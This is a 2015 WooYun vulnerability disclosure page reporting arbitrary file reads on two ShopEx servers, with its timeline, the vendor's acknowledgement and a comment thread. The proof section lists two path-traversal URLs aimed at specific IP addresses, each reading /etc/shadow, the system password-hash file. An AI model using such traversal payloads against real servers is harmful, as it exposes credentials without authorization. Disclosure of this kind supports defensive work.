当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092712

漏洞标题:ShopEx某两台服务器任意文件读取

相关厂商:ShopEx

漏洞作者: 小川

提交时间:2015-01-19 17:30

修复时间:2015-03-05 17:32

公开时间:2015-03-05 17:32

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-30: 细节向核心白帽子及相关领域专家公开
2015-02-09: 细节向普通白帽子公开
2015-02-19: 细节向实习白帽子公开
2015-03-05: 细节向公众公开

简要描述:

偷师学艺

详细说明:

ragecomic.png

漏洞证明:

http://122.144.135.187:8888/../../../../../../../../../../../../../../../../../etc/shadow
http://121.196.44.117:8888/../../../../../../../../../../../../../../../../../etc/shadow

修复方案:

我也不知道

版权声明:转载请注明来源 小川@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-01-20 08:30

厂商回复:

非常感谢您为shopex信息安全做的贡献
我们将尽快修复
非常感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-19 17:31 | 小驴牙牙 ( 普通白帽子 | Rank:168 漏洞数:42 | 不断学习,进步!)

    看成了两处任意文件读取

  2. 2015-01-19 17:47 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:70 | 人这一辈子总要动真格的爱上什么人)

    川神

  3. 2015-01-19 17:49 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    我去!传神转通用审计了?

  4. 2015-01-19 17:51 | boooooom 认证白帽子 ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法!)

    一定是学我的~

  5. 2015-01-19 17:56 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:208 | 一个致力要将乌云变成搞笑论坛的男人)

    @boooooom 师傅

  6. 2015-01-19 17:57 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:208 | 一个致力要将乌云变成搞笑论坛的男人)

    @px1624 我这么菜,怎么可能

  7. 2015-01-19 19:51 | Cyrils ( 实习白帽子 | Rank:45 漏洞数:7 | the more the better)

    @小川 大牛们,这一系列的洞是个什么错误导致的?

  8. 2015-01-26 00:59 | 橘子 ( 路人 | Rank:0 漏洞数:3 | 呢个...羞射高中生一枚。带上大神@Haswell...)

    这期漫画怎么还不公开

  9. 2015-03-27 17:00 | Aerfa21 ( 普通白帽子 | Rank:165 漏洞数:44 )

    大小川好画工,你是怎么发现可以用发请求的工具,原理是?